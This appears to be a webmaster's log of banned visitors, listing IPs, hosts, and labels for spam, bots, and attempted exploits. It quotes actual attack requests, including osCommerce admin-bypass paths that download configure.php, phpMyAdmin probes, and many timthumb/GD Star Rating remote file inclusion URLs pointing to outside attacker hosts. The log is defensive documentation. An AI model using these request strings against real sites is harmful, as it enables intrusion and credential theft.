192.119.151.236 Company: United States – Dallas Avante Vps Comment Spammer
67.180.120.250 Hostname: c-67-180-120-250.hsd1.ca.comcast.net
Company: United States – Antioch Comcast Cable Communications Inc
Trying to link to stylesheets (no referrer)
64.251.27.252 Hostname: 252-27-251-64.serverpronto.com
Company: United States – Fort Lauderdale Serverpronto
Trying to access WordPress xmlrpc.php directly without loading pages
61.61.140.148 Hostname: kgt.com.tw
Company: Taiwan, Province Of China – Taipei Kgex.com
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
//wp-content/gd-star-rating/?src=http: //picasa.com.moveissantafe.com/yahoo.php
184.171.245.110 Hostname: 184-171-245-110.static.dimenoc.com
Company: United States Orlando Hostdime.com Inc.
Trying to access WordPress xmlrpc.php directly without loading pages
103.17.58.28 Located in Indonesia, ASN IDNIC-INDOMARET-AS-ID PT. Indomarco Prismatama Crawling Java and CSS files directly
208.115.113.89 Company: United States – Washington Dotnetdotcom.org Banned Spy bot: Ezooms
Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)
193.86.137.52 Company: Czech Republic Prague Gts Czech S.r.o.
37.34.55.207 Hostname: sv01.leisure-it.nl
Company: Netherlands – Amsterdam Xl Internet Services B.v.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
108.163.161.74 Hostname: night2live.com
Company: Mexico – Monterrey David Varela
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
184.82.10.101 Hostname: 184-82-10-101.static.hostnoc.net
Company: United States – Network Operations Center Inc.
Comment Spammer
173.245.220.175 Company: United States San Jose Egihosting Comment Spammer
157.86.172.250 Company: Brazil Rio De Janeiro Fundacao Oswaldo Cruz Timthumb RFI script attack:
/wp-content/themes/TheStyle/timthumb.php?src=http: //picasa.com.ganesavaloczi.hu/jos.php
65.55.213.66 Hostname: msnbot-65-55-213-66.search.msn.com
Company: United States – Bristow Microsoft Corp
msnbot/2.0b (+http: //search.msn.com/msnbot.htm)
Rule breaker – ignored robots.txt
Found Honeypot trap file
190.206.252.124 Hostname: 190-206-252-124.dyn.dsl.cantv.net
Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Trackback Spammer
195.191.252.60 Hostname: roadrunner.mysys.at
Company: Austria – Semriach Martin Jantscher Trading As Mysys Telekom
Known mail server and dictionary attacker
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
174.36.153.149 Hostname: sea-stream01.broadcastmatrix.com
Company: United States – Baton Rouge Hosting Services Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
142.4.127.29 Company: United States – San Jose Xs (PEGTECHINC – PEG TECH INC) Bad Host: San Jose Xs
Comment Spammer
184.107.48.219 Hostname: server1.basehost.com.br
Company: Canada – Montreal Iweb Dedicated Cl
Looking for wpOnline Store/osCommerce/ZenCart vulnerability:
[URL]/&sa=U&ei=5lFPUbbbG8KUiQKm1oCgDg&ved=0CIoCEBYwSg&usg=
AFQjCNHyZp2pDRxETc0MlnY8Su3riaXqmg/admin/categories.php/login.php
/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
37.113.50.49 Hostname: 37x113x50x49.dynamic.penza.ertelecom.ru
Company: Russian Federation – Penza Cjsc Er-telecom Holding
Comment Spammer
67.202.49.215 Hostname: ec2-67-202-49-215.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Looking for non-existent URLs
/bundles/framework/css/exception.css
/sf/sf_default/css/screen.css
64.120.167.34 Hostname: 64-120-167-34.static.hostnoc.net
Company: United States – Network Operations Center Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
130.207.122.165 Hostname: manganese.cc.gatech.edu
Company: United States – Atlanta Georgia Institute Of Technology
Banned for trying to access script functions
(function()%7Bwindow.twttr=window.twttr||%7B%7D;var%20D=550,A=450,C=
screen.height,B=screen.width,H=Math.round((B/2)-(D/2)),G=0,F=document,E;if
(C%3EA)%7BG=Math.round((C/2)-(A/2))%7Dwindow.twttr.shareWin=window.ope
n(‘http:/twitter.com/share’,”,’left=’+H+’,top=’+G+’,width=’+D+’,height=’+A+’,personalbar=
0,toolbar=0,scrollbars=1,resizable=1′);E=F.createElement(‘script’);E.src=
‘http:/platform.twitter.com/bookmarklets/share.js?v=1’;F.getElementsByTagName
(‘head’)%5B0%5D.appendChild(E)%7D());
204.124.180.55 Company: United States – Scranton Volumedrive
Website hosting server for ia-asc.net
Trying to register on site.
199.102.76.250 Hostname: pzok.x.rootbsd.net
Company: United States – Raleigh Tranquil Hosting Inc.
Trying to access admin server scripts
/phpmyadmin/index.php
/pma/index.php
/myadmin/index.php
173.192.235.226 Hostname: 173.192.235.226-static.reverse.softlayer.com
Company: United States – Knoxville Softlayer Technologies Inc.
Banned Bot:
Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http: //siteexplorer.info/)
Looking for content creation weaknesses
208.71.11.178 Hostname: 208-71-11-178.zerofail.com
Company: Canada – Verdun Zerofail
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
64.15.155.121 Hostname: server3.cnbb.org.br
Company: Canada – Montreal Iweb Dedicated Cl
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
194.116.187.25 Hostname: turbolrrr.planet-school.de
Company: Germany – Frankfurt Am Main Planet School Webhosting E.k.
Shared hosting server – 1175 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
91.200.40.82 Hostname: h82.hvosting.ua
Company: Ukraine – Kiev Pe Konstantin Vladimirovich Kravchenko
Shared hosting server
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.phpBANNED REGION: UKKRAINE
66.172.56.8 Hostname: web049.lax1.coolhandle.com
Company: United States – Los Angeles Cool Handle Hosting
Shared hosting server
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
137.117.68.98 Company: United States – Redmond Microsoft Corp Comment Spammer
187.149.241.160 Hostname: dsl-187-149-241-160-dyn.prod-infinitum.com.mx
Company: Mexico – Mexico City Uninet S.a. De C.v.
Banned for Hotlinking
76.179.144.239 Hostname: cpe-76-179-144-239.maine.res.rr.com
Company: United States – Ellsworth Road Runner Holdco Llc
Website Hosting: tralce.com (This is bad website – it may have been created for hacking purposes!)
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
36.251.43.51 Company: China – Fuzhou Fuzhou City Fujian Provincial Network Of Unicom Trying to create user account and post content:
/CreateUser.asp
/logging.php?action=login
/login.php?part=register
/member.php/register.php?type=company
/member.php?action=login&mod=logging
/member/index_do.php?dopost=regnew&fmdo=user
/post.php
/reg.asp
/register.aspx
142.4.101.12 Company: United States – San Jose Sosoym.com Comment Spammer
41.193.5.52 Hostname: lan-linux-01.hc8.voxcore.co.za
Company: South Africa – Johannesburg Jhb Hosting Zone Customer Vlans
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Looking for banned URL: */is-human/
137.116.193.224 Company: United States – Redmond Microsoft Corp Banned for repeated attempts to register on site.
190.85.37.90 Company: Colombia – Bogota Telmex Colombia S.a Comment Spammer
173.237.189.182 Hostname: rock.serverdnspoint.com
Company: United States – Dallas Colo4 Llc
Website hosting server: tu-adelanto.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
69.175.26.90 Hostname: web2.beastnode.net
Company: United States Chicago Singlehop Inc.
Shared hasting server.
Trying to access site admin:
administrators.php/login.php
195.199.230.101 Hostname: server.brody-ajka.sulinet.hu
Company: Hungary – Ajka Brody Imre Gimnazium Es Szakkozepiskola
Hacker activity:
/admin/modules.php/login.php
190.111.122.2 Company: Venezuela, Bolivarian Republic Of Valencia Ewinet C.a. Comment Spammer
108.178.60.198 Hostname: 12.dofollow8.servinio.com
Company: United States – Chicago Singlehop Inc. (Again)
Comment Spammer
173.237.182.72 Hostname: 173.237.182.72.tailormadeservers.com
Company: United States – Dallas Dfw Datacenter
Looking for zipped files with .7z .rar .zip extension
139.192.70.57 Company: Indonesia – Jakarta Pt. First Media Tbk Multiple violations:
Suspicious activity:
%3Cdiv%20id=%22fb-root%22%3E%3C/div%3E%20%3Cscript%3E(function
(d,%20s,%20id)%20{%20%20%20var%20js,%20fjs%20=%20d.getElementsByTagName
(s)[0];%20%20%20if%20(d.getElementById(id))%20return;%20%20%20js%20=%20d.
createElement(s);%20js.id%20=%20id;%20%20%20js.src%20=%20%22//
connect.facebook.net/en_GB/all.jsTrying to read CAPTCHA code without accessing post:
/?ctf_show_captcha=1&ctf_sm_captcha=1&ctf_form_num=2
108.166.79.24 Website moviora.com on GoDaddy Shared Hosting Server Banned for hotlinking to images
37.112.73.147 Hostname: dynamicip-37-112-73-147.pppoe.nn.ertelecom.ru
Company: Russian Federation – Nizhniy Novgorod Cjsc Er-telecom Holding
Comment Spammer
184.154.170.50 Hostname: node01.4wd4.com
Company: United States – Chicago Singlehop Inc.
WordPress timthumb RFI attempt
/wp-content/themes/striking/includes/timthumb.php?src=http %3A%2F%2Fimg.youtube .com.portalimobiliariodesergipe.com.br%2Fcache.php
37.113.36.116 Hostname: dynamicip-37-112-73-147.pppoe.nn.ertelecom.ru
Company: Russian Federation – Penza Cjsc Er-telecom Holding
Comment Spammer
36.249.142.136 Company: China – Xiamen Xiamen City Fujian Provincial Network Of Unicom Brute force attempt to register/login to site
Attempt to access non-existent CGI scripts
173.193.205.248 Hostname: 173.193.205.248-static.reverse.softlayer.com
Company: United States – Sacramento Softlayer Technologies Inc.
Rule Breaker: Looking for non-existent URLS
Banned User Agent:
Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http: //siteexplorer.info/)
SiteExplorer/1.0 http //siteexplorer.info/
SiteExplorer/1.0 http ://siteexplorer.info/
142.4.99.164 Company: United States – San Jose Jinsu Technology Limited Liability Company Comment Spammer
199.19.105.94 Company: United States – Scranton Volumedrive Comment Spammer
201.216.232.48 Hostname: pluton.xmundo.net
Company: Argentina – Buenos Aires Nss S.a.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.17.133.22 Hostname: 173-17-133-22.client.mchsi.com
Company: United States – Jackson Mediacom Communications Corp
Lookhing for CGI vulnerability:
/cgi-bin/cgiemail/cgi-bin//mailmoct.txt
108.163.221.82 Hostname: 30.dofollow4.servinio.com
Company: United States – Chicago Singlehop Inc.
Bot attempting to login/register
Mail Server
192.74.224.252 Company: United States – San Jose Peg Tech Inc Comment Spammer
216.224.174.67 Hostname: vps-1120333-14095.manage.myhosting.com
Company: United States – Truckee Softcom America Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
184.105.211.2 Hostname: kilo.he.net
Company: United States – Fremont Hurricane Electric Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/2/&sa=U&ei=aB04UZrGAcKxO9_jgfgK&ved=0CGYQFjAZOKwC&usg=
AFQjCNG5VZENUe8_EGlytk4y9WzjhJGYtg/admin/banner_manager.php/login.php
/2/&sa=U&ei=Vh04UaHYPMWHqQHBr4GwAg&ved=0CHIQFjAcOMgB&usg=
AFQjCNGNVUF9OqDjrHzWAnE91qWgmJ0x_A/admin/file_manager.php/login.php
Trying to access non-existing path /zboard.php?id=byroe
192.74.239.115 Company: United States – San Jose Qingfeng Simple DoS attack resulting in hundreds of hits to a single URL
[article-url]/index.php
63.170.254.21 Company: United States – Covington Scp Pool Corporation Hacker
/phpMyAdmin/scripts/setup.php
FAKE USER AGENT: Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)
108.74.189.16 Hostname: 108-74-189-16.lightspeed.tukrga.sbcglobal.net
Company: United States – Tucker AT&T Internet Services
Comment Spammer
50.30.32.91 Hostname: usloft2553.serverloft.com
Company: United States – Saint Louis Hosting Solutions International Inc.
Comment Spammer
192.119.148.235 Company: United States – Dallas Gretchen Holmes Comment Spammer
173.232.104.30 Company: United States – Newhall Blue Deals Fly Comment Spammer
173.232.88.99 Hostname: mx99.derrenger.com
Company: United States – Kittery 5280 Enterprises Llc
Comment Spammer
142.54.190.204 Company: United States – Kansas City Datashack Lc Comment Spammer
199.116.85.253 Hostname: 199-116-85-253.5280enterprises.com
Company: United States Kittery 5280 Enterprises Llc
Comment Spammer
72.55.165.147 Company: Canada – Montreal Iweb Dedicated Cl
(Shared Hosting Server)
RFI attempt
/wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php?src=http:
//flickr.com.alba-sport.net/bad.php
65.61.39.39 Hostname: vps-1004249-420.site.infoquest.com
Company: United States – Harrisburg Infoquest Technologies Inc.
(Shared Hosting Server)
WordPress timthumb RFI exploit attempt
/wp-content/plugins/thethe-image-slider/timthumb.php?src=http
%3A%2F%2Fupload.wikimedia.org.twymsln.com/stunz.php
Blocked by Firewall – BANNED
141.105.87.76 Company: Lebanon – Beirut Transmog Inc S.a.l Comment Spammer
Found Honeypot trap
177.70.5.94 Hostname: th1021530.cloudth.com.br
Company: Brazil – Sao Paulo Desenvolve Solucoes De Internet Ltda
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
//wp-content/gd-star-rating/?src=http %3A%2F%2Fpicasa.com.m-2p.com/suntik.php
198.143.186.81 Hostname: vpsnode5.hostthename.com
Company: United States – Chicago Singlehop Inc.
Shared Hosting server
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
//wp-content/gd-star-rating/?src=http %3A%2F%2Fpicasa.com.m-2p.com/suntik.php
176.9.40.226 Hostname: static.226.40.9.176.clients.your-server.de
Company: Germany – Nuremberg Hetzner Online Ag
Shared Hosting server
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
//wp-content/gd-star-rating/?src=http %3A%2F%2Fpicasa.com.m-2p.com/suntik.php
88.191.94.202 Hostname: srv1.felten.biz
Company: France – Paris Free Sas
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
/wp-content/gd-star-rating/timthumb.php?src=http %3A%2F%2Fblogger.com.lendyourhome.org%2Fcok.php
37.59.32.19 Hostname: srv1.felten.biz
Company: France – Roubaix Ovh Systems
Shared Hosting server
Brute force Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
/wp-content/gd-star-rating/timthumb.php?src=http %3A%2F%2Fblogger.com.lendyourhome.org%2Fcok.php
74.117.220.26 Hostname: ns26.dnchosting.com
Company: Cayman Islands – George Town Directnic Ltd.
Brute force Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
/wp-content/gd-star-rating/timthumb.php?src=http %3A%2F%2Fblogger.com.lendyourhome.org%2Fcok.php
88.191.94.202 Hostname: mb2d151.vdrs.net
Company: Viet Nam – Thanh Pho Ho Chi Minh Cong Ty Co Phan Dich Vu Du Lieu Truc Tuyen
Brute force Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
/wp-content/gd-star-rating/timthumb.php?src=http %3A%2F%2Fblogger.com.lendyourhome.org%2Fcok.php
50.117.61.100 Company: United States – San Jose Detectnetwork.us JavaScript Injection attack blocked by firewall
Trying to include content linking to kamagra websites
199.241.191.131 Company: United Kingdom – Charlwood Kamran Moussa-zadeh Attempting WordPress timthumb RFI exploit:
/wp-content/themes/Widescreen/includes/timthumb.php?src=http: //flickr.com.alba-sport.net/bad.php
50.22.199.170 Hostname: 50.22.199.170-static.reverse.softlayer.com
Company: United States – Dallas Softlayer Technologies Inc.
User Agent: SiteExplorer/1.0 http ://siteexplorer.info/
Highly suspicious activity
/-ir)hvcFaenuiicli3bner2-an.co.1h-obme)St5hapter-2-ae.caenem%20r3aenu-itemem%20r3aenu-itememp
/%3Che0ud
/-ir)hvcFaenuiicli3bner2-an.co.1h-obme)St5hapter-2-aenu-
And similar non-existent URLS
BANNED USER AGENT SiteExplorer/1.0
173.233.69.208 Hostname: 173-233-69-208.STATIC.turnkeyinternet.net
United States – Latham Turnkey Internet Inc.
Probing for vulnerabilities
Mail server / shared website hosting server
195.190.28.97 Hostname: cluster1.greenhost.nl
Company: Netherlands – Amsterdam Mart Jaco Van Santen Trading As Greenhost Vof
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
37.1.222.20 Company: Germany – Berlin 3nt Solutions Llp
Web server – 1 website: australia-impotence.com
Trying to login/register
65.55.24.239
65.55.213.193
Hostname: msnbot-65-55-24-239.search.msn.com
Company: United States Redmond Microsoft Corp
Rule breaker.
MSN bot has started looking for script functions e.g.
/function.require
After several months of watching MSN/bing bots crawling disallowed files and folders,
I am now blocking their bots completely
This behaviour by Microsoft web bots is totally unacceptable – their bots totally ignore robots.txt
159.253.21.202 Hostname: delilinux.org
Company: Estonia – Johvi Fastvps Eesti Ou
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
65.55.213.193 Hostname: msnbot-65-55-213-193.search.msn.com
Company: United States – Bristow Microsoft Corp
Rule Breaker:
BANNED BOT: MSN Bot / search.msn.com
195.189.140.141 Hostname: 141.hosting-5.xtream.co.il
Company: Israel – Tel Aviv Q-host Internet Services – Hosting
DoS attack blocked by firewall
Attempted wpOnlineStore/osCommerce/Zencart exploit:
//reviews/wponlinestore-review//admin/categories.php/login.php
//reviews/wponlinestore-review//admin/categories.php/login.php?cPath=&action=new_product_preview
//reviews/images/m32.php
151.237.190.156 Company: Sweden – Stockholm Deepak Mehta Fie Comment Spammer
190.0.19.146 Hostname: mail.cmplogistica.com
Company: Colombia – Medellin Epm Telecomunicaciones S.a. E.s.p.
Comment Spammer
190.38.71.223 Hostname: 190-38-71-223.dyn.dsl.cantv.net
Company: Venezuela – Bolivarian Republic Of Caracas Cantv Servicios Venezuela
Comment Spammer
219.166.139.187 Hostname: himej-ys.jp
Company: Japan – Tokyo Co. Centralsuccess
WordPress timthumb RFI attempt.
/wp-content/plugins/shortcodes-ultimate/lib/timthumb.php?src=http
%3A%2F%2Fpicasa.com.debateandreview.com/tim/up.php
87.106.207.9 Hostname: s15346772.onlinehome-server.info
Company: Spain 1&1 Internet Ag
WordPress timthumb RFI attempt.
/wp-content/themes/bueno/timthumb.php?src=http
%3A%2F%2Fpicasa.com.debateandreview.com/tim/up.php
66.209.51.70 Hostname: mail.osmh.on.ca
Company: Canada – Orillia Orillia Soldiers Memorial Hospital
User Agent: CCBot/1.0 (+http: //www.commoncrawl.org/bot.html)
Hacker looking for server scripts:
/sql/scripts/setup.php
/phpmyadmin2/scripts/setup.php
/pma/scripts/setup.php
/phpMyAdmin/scripts/setup.php
195.211.149.66 Hostname: public-66.WATSON.ZP.UA
Company: Ukraine – Zaporizhzhya Pe Vaschuk Alexander Sergeevich
Hacker activity
/engine/engine.php
fpw.php
configuration.php
wp-admin.php
184.172.128.123 Hostname: pre.prendo.net
Company: United States – Salt Lake City Theplanet.com Internet Services Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
184.154.176.98 Hostname: ch1-cid11030037-201104051156.spheryx.net
Company: United States – Chicago Singlehop Inc.
Shared Hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
204.93.60.17 Company: United States – Torrance Giglinx Inc. JavaScript injection attempt blocked by firewall
184.82.92.86 Hostname: service.productservicestuv.com
Company: United States – Chandler Dme Hosting Llc
Brute Force login attempt
/wp-login.php
78.85.13.117 Hostname: a117.sub13.net78.udm.net
Company: Russian Federation – Izhevsk First Assignment
RFI attack detected
//wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php
14.98.167.150 Hostname: Static-150.167.98.14.tataidc.co.in
Company: India – Delhi Tata Teleservices Ltd – Tata Indicom – Cdma Division
Comment Spammer
Mail Server
192.119.148.43 Company: United States – Dallas Louis Joseph Comment Spammer
37.75.10.122 Hostname: 37-75-10-122.rdns.saglayici.net
Company: Turkey – Istanbul Saglayici Teknoloji Bilisim Yayincilik Hiz. Ticaret Ltd. Sti.
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
/gd-star-ratings-vulnerability//wp-content/gd-star-rating/?src=http: //flickr.com.alba-sport.net/bad.php
142.91.180.35 Hostname: 142.91.180.35.rdns.ubiquity.io
Company: United States – Dallas Ubiquity Server Solutions Dallas
Comment Spammer
69.16.211.147 Hostname: titan.sitebuilder-hosting.como
Company: United States – New York City Liquid Web Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
205.164.32.102 Company: United States San Jose Detectnetwork.us JavaScript injection attack detected:
Trying to redirect to Kamagra related websites
37.59.205.106 Company: France – Roubaix Ovh Systems Bot attempting to login/register
37.59.150.112 Company: France – Roubaix Ovh Systems Bot attempting to login/register
184.154.57.93 Hostname: vm18.dofollow2.servinio.com
Company: United States – Chicago Singlehop Inc.
Bot attempting to login/register
184.154.221.147 Hostname: 46.dofollow5.servinio.com
Company: United States – Chicago Singlehop Inc.
Comment Spammer
199.204.45.171 Hostname: node-1jfq017.cloud9.ymq1.ca.layeredge.net
Company: Canada – Montreal Vexxhost
Comment Spammer
184.154.205.189 Hostname: 6.dofollow7.servinio.com
Company: United States – Chicago Singlehop Inc.
Tried to Register/login
63.141.199.118 Company: United States – Torrance Giglinx Inc. Comment Spammer
JavaScript Injection attack blocked by firewall
77.92.72.99 Hostname: listmail.permissionedemails.co.uk
Company: United Kingdom – London Uk2 – Ltd
Attempting WordPress timthumb RFI exploit:
/wp-content/plugins/shortcodes-ultimate/lib/timthumb.php?src=http
%3A%2F%2Fpicasa.com.chevyregina.com/bajo.php
188.132.210.119 Hostname:static-119-210-132-188.sadecehosting.net
Company: Turkey – Istanbul Hosting Internet Hizmetleri Ltd Sti
Attempting WordPress timthumb RFI exploit:
/wp-content/themes/listings/thumb.php?src=http
%3A%2F%2Fblogger.com.thephysicscorner.com%2Fbad.php
211.39.253.100 Hostname: t1.dothost.co.kr
Company: Korea, Republic Of – Seoul Scmjbc
Trying WordPress GD Star Rating plugin RFI exploit
/wp-content/gd-star-rating/?src=http: //picasa.com.compraonlinecr.com/index.php
46.105.2.157 Hostname: vps10879.ovh.net
Company: France – Roubaix Ovh Systems
Trying WordPress GD Star Rating plugin RFI exploit
/wp-content/gd-star-rating/?src=http: //picasa.com.compraonlinecr.com/index.php
108.167.186.180 Hostname: vps.solin.adv.br
Company: United States – Houston Websitewelcome.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
164.151.194.21 Hostname: 164.151.194.21.static.because.DUL.is.RFC.ignorant.gov.za
Company: South Africa – Cape Town Government Of South Africa
Looking for non-existent paths in system folders.
BANNED
198.143.162.27 Hostname: df22.dofollow.biz
Company: United States Chicago Singlehop Inc.
Malicious User Agent: PHP/5.2.10
37.113.12.51 Company: Russian Federation – Penza Cjsc Er-telecom Holding Comment Spammer
78.46.64.45 Hostname: static.45.64.46.78.clients.your-server.de
Company: Germany Nuremberg Hetzner Online Ag
Attempting WordPress timthumb RFI exploit:
/wp-content/themes/Mystique/cache/timthumb.php?src= http:
//wordpress.com.projetoulisses.com/byroe.php
Stopped by server security – Banned
199.19.109.220 Hostname: The.Easiest.The.Best.VPSInfinity.com
Company: United States – Scranton Volumedrive
Comment Spammer
Found honeypot trap files
69.50.196.80 Hostname: evoxmanagement.com
Company: United States – Phoenix Atjeu Publishing Llc
Attempting WordPress timthumb RFI exploit:
/wp-content/themes/twentyeleven/scripts/timthumb.php?src=http
%3A%2F%2Fflickr.com.alba-sport.net%2Fbad.php
/nomnom-theme/wp-content/themes/twentyeleven/scripts/timthumb.php?src=http
%3A%2F%2Fflickr.com.alba-sport.net%2Fbad.php
/nomnom-theme/&sa=U&ei=fW4NUbqDN8agiAL_1YGwBw&ved=0CH4QFjAi&usg=
AFQjCNE9sIh1pBfJxCt4ZlPlqVKgMNgKaQ/wp-content/themes/twentyeleven/scri
164.177.151.5 Hostname: 164-177-151-5.static.cloud-ips.co.uk
Company: United Kingdom – Uxbridge Rackspace.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
50.117.61.20 Hostname: 208-115-111-73-reverse.wowrack.com
Company: United States – San Jose Detectnetwork.us
Comment Spammer
JavaScript injection attempt
37.144.91.83 Hostname: 37-144-91-83.broadband.corbina.ru
Company: Russian Federation – Moscow Dynamic Ip Pool For Broadband Customers
Attempting to login to site admin
100.43.83.135 Hostname: spider-100-43-83-135.yandex.com
Company: United States – Palo Alto Yandex Inc
YANDEX bot
142.91.79.26 Hostname: 142.91.79.26.rdns.ubiquity.io
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Comment Spammer
68.234.17.175 Hostname: reverse.aeori.com Comment Spammer
24.115.243.119 Hostname: 24.115.243.119.res-cmts.sm.ptd.net
Company: United States – Macungie Penteledata Inc
Comment Spammer
37.59.74.238 Company: France – Roubaix Ovh Systems Attempting to register/login
108.178.25.198 Hostname: 18.dofollow4.servinio.com
Company: United States – Chicago Singlehop Inc.
Comment Spammer
199.180.119.201 Company: United States – Scranton Volumedrive Comment Spammer
173.208.2.109 Hostname: 173.208.2.109.rdns.ubiquityservers.com
Company: United States – Chicago Ubiquity Server Solutions Chicago
Comment Spammer
173.234.196.209 Company: United States – Chicago Ubiquity Server Solutions Chicago Comment Spammer
174.34.212.141 Hostname: 141.212-34-174.ftth.swbr.surewest.net
Company: United States – Sacramento Surewest Broadband
Comment Spammer
173.245.64.2 Company: United States – Montebello Detectnetwork.us Comment Spammer
JavaScript malware in comment
209.188.3.172 Hostname: s01.sideservers.com
Company: United States – Phoenix Secured Servers Llc
Trying WordPress GD Star Rating plugin & timthumb RFI exploit
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.alba-sport.net/bad.php
71.6.203.27 Hostname: asterix.havendata.net
Company: United States – San Diego Carinet Inc.
Trying WordPress timthumb RFI exploit
/wp-content/plugins/logo-management/includes/timthumb.php?src=http:
//picasa.com.kidsworldprintables.com/result/bat.php
82.33.211.221 Hostname: web01.serversname.com
Company: United Kingdom – Woking Continental.
Trying WordPress timthumb RFI exploit
/wp-content/plugins/jetpack/timthumb.php?src=http %3A%2F%2Fflickr.com.guille.net%2Fbad.php
199.59.56.24 Hostname: frog.novo-flash.com
Company: United States – Tulsa Hostwinds Llc.
Attempting to register/login
216.157.31.148 Company: United States – Southgate Peer 1 Dedicated Hosting Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.144.116.181 Company: United States – Torrance Giglinx Inc. Comment Spammer.
Basic Javascript Injection attempted
91.121.27.38 Hostname: ns25033.ovh.net
Company: France – Roubaix Ovh Systems
Attempting WordPress timthumb RFI exploit
/wp-content/themes/delicious/scripts/timthumb.php?src=http:
//flickr.community.felipealliende.cl/wp-login.php
Mail Server
Banned Host: Roubaix Ovh Systems
188.165.251.128 Hostname: ks215201.kimsufi.com
Company: France – Roubaix Ovh Systems
Attempting WordPress timthumb RFI exploit
/wp-content/themes/delicious/scripts/timthumb.php?src=http: //img.youtube.com.parsau.cl/youtube.php
Banned Host: Roubaix Ovh Systems
